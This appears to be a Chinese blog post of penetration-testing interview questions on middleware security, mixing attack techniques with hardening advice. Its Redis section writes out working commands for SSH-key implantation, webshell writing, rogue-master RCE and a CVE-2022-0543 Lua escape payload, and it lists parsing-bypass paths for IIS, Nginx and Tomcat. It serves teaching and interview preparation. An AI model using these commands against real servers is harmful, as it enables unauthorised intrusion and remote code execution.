2025年常见渗透测试面试题- 常见中间件(题目+回答)

发布于:2025-04-13 ⋅ 阅读:(17) ⋅ 点赞:(0)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 常见中间件

一、Redis未授权访问漏洞攻防全解

1. 漏洞利用三板斧

2. 新型攻击手法

3. 防御体系构建

二、中间件解析漏洞全景剖析

1. 经典解析漏洞矩阵

2. 高级利用技巧

3. 防御方案

三、Java中间件生态全景

1. 主流容器对比

2. 新兴力量

四、Tomcat安全加固十二律

五、Tomcat持久化机制解密

1. 部署目录行为分析

2. 防御实践

六、中间件安全演进趋势

深度防御建议

 常见中间件

Redis未授权访问漏洞如何入侵利用?

说说常见的中间件解析漏洞利用方式

JAVA有哪些比较常见的中间件容器?

tomcat要做哪些安全加固?

如果tomcat重启的话,webapps下,你删除的后台会不会又回来?

常见的网站服务器中间件容器。

一、Redis未授权访问漏洞攻防全解

1. 漏洞利用三板斧
  1. SSH密钥植入

    bashredis-cli -h 10.2.3.4 flushall echo -e "\n\nssh-rsa AAAAB3NzaC1yc... user@kali" | redis-cli -x set crackit redis-cli config set dir /root/.ssh/ redis-cli config set dbfilename "authorized_keys" redis-cli save 

    通过修改Redis持久化路径,将公钥写入目标服务器认证文件

  2. Webshell写入
    适用于Web目录已知场景:

    bashredis-cli config set dir /var/www/html/ redis-cli set shell "<?phpsystem($_GET['cmd']);?>" redis-cli config set dbfilename "webshell.php" redis-cli save 
  3. 主从复制RCE
    利用模块化攻击框架:

    bashpython3 redis-rogue-server.py --rhost 10.2.3.4 --lhost 192.168.1.5 

    通过恶意主节点发送module load指令加载.so扩展库实现命令执行

2. 新型攻击手法
  • CVE-2022-0543 Lua沙箱逃逸
    利用Debian补丁漏洞执行任意命令:
    luaeval 'local io = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io(); local f = io.popen("id", "r"); local res = f:read("*a"); return res' 0 
3. 防御体系构建
bash# 修改redis.conf 关键配置 requirepass MyS3cr3tP@ss bind 127.0.0.1 ::1 rename-command FLUSHALL "" protected-mode yes 

二、中间件解析漏洞全景剖析

1. 经典解析漏洞矩阵
中间件 漏洞类型 利用示例 影响版本
IIS 6.0 目录解析漏洞 /test.asp/test.jpg Windows Server 2003
Apache 文件名解析特性 shell.php.rar 所有版本
Nginx %00截断 /test.jpg%00.php <0.8.37
PHP-CGI 参数解析漏洞 /test.jpg -s 192.168.1.5:4444 PHP<5.3.12
Tomcat 后缀绕过 /shell.jsp%20 7.x/8.x
2. 高级利用技巧
  1. IIS短文件名爆破
    使用工具扫描暴露的8.3格式短文件名:

    bashiis_shortname_scan.py -u http://target/
  2. Nginx配置错误
    错误配置导致源码泄露:

    nginxlocation /static { alias /var/www/; }

    访问/static../app/config.py 获取敏感文件

  3. WebLogic特殊后缀

    httpGET /ws_utc/begin.do?.css HTTP/1.1 
3. 防御方案
  1. IIS加固
    • 禁用ASP解析功能
    • 配置请求过滤规则
  2. Apache修复
    apache<FilesMatch "\.ph(p[3457]?|t|tml)$"> SetHandler application/x-httpd-php </FilesMatch>

三、Java中间件生态全景

1. 主流容器对比
中间件 核心特性 常见漏洞
Tomcat Servlet/JSP容器 CVE-2017-12615(PUT上传)
WebLogic 企业级J2EE应用服务器 CVE-2020-14882(未授权RCE)
Jetty 轻量级嵌入式容器 CVE-2021-28169(路径遍历)
JBoss/WildFly Java EE开源实现 CVE-2017-12149(反序列化)
WebSphere IBM商业级解决方案 CVE-2020-4450(IIOP反序列化)
2. 新兴力量
  • Undertow:Red Hat高性能非阻塞服务器
  • Payara:GlassFish社区分支
  • OpenLiberty:IBM轻量化微服务容器

四、Tomcat安全加固十二律

  1. 权限最小化

    bashuseradd -M -s /sbin/nologin tomcat_user chown -R tomcat_user:tomcat_group /opt/tomcat/
  2. 配置强化

    xml<!-- conf/server.xml --> <Connector port="8080" maxHttpHeaderSize="8192" server="Undisclosed" address="127.0.0.1"/>
  3. 管理界面防护

    xml<!-- conf/tomcat-users.xml --> <role rolename="manager-script"/> <user username="deployer" password="Zxcv@1234!" roles="manager-script"/>
  4. 协议升级

    xml<Connector SSLEnabled="true" sslProtocol="TLS" sslEnabledProtocols="TLSv1.2,TLSv1.3" ciphers="TLS_AES_256_GCM_SHA384,..."/>
  5. 入侵检测配置

    bash# 部署Logstash监控日志 input { file { path => "/opt/tomcat/logs/*.log" start_position => "beginning" } }

五、Tomcat持久化机制解密

1. 部署目录行为分析
  • 热部署机制webapps/目录变更触发自动加载
  • 备份恢复场景
    bash# 典型目录结构 webapps/ ├── ROOT ├── app1.war ├── app1/ └── backup/ └── app1_20240411.bak 
2. 防御实践
  1. 彻底删除流程

    bashrm -rf webapps/app1/ # 删除解压目录 rm webapps/app1.war # 删除部署包 sed -i '/app1/d' conf/Catalina/localhost/*.xml # 清理配置文件 
  2. 防止自动恢复

    xml<!-- conf/context.xml --> <Context antiResourceLocking="true" antiJARLocking="true"> <WatchedResource>WEB-INF/web.xml</WatchedResource> </Context>

六、中间件安全演进趋势

  1. 云原生转型
    • 容器化部署:Kubernetes Operator管理中间件
    • Service Mesh:Istio实现安全流量管控
  2. 智能防护体系
    • AI驱动的WAF:动态识别0day攻击
    • RASP技术:实时阻断内存马注入
  3. 合规驱动
    • 等保2.0三级要求
    • GDPR数据安全规范
  4. 供应链安全
    • SBOM(软件物料清单)管理
    • 镜像签名验证
  5. 零信任架构
    • SPIFFE身份认证
    • 持续动态授权

深度防御建议

  1. 建立中间件资产清单

    csvIP地址,中间件类型,版本号,开放端口,负责人 10.1.2.3,Tomcat,9.0.64,8080,张三 10.1.2.4,WebLogic,12.2.1.4,7001,李四 
  2. 自动化漏洞扫描

    bash# 使用Nexpose执行扫描 nexpose -s 10.1.2.0/24 -t middleware_scan 
  3. 红蓝对抗演练

    mermaidgraph LR A[制定攻击方案] --> B[模拟入侵] B --> C[横向移动] C --> D[获取敏感数据] D --> E[编写防御手册]
  4. 安全左移实践

    bash# 在CI/CD流水线集成安全检查 mvn verify -Dincludes=**/*.jsp -Dcheckstyle.config=security-check.xml 

本体系化解决方案覆盖中间件全生命周期安全管理,建议结合ATT&CK框架构建持续监控能力,通过自动化工具链实现安全能力闭环。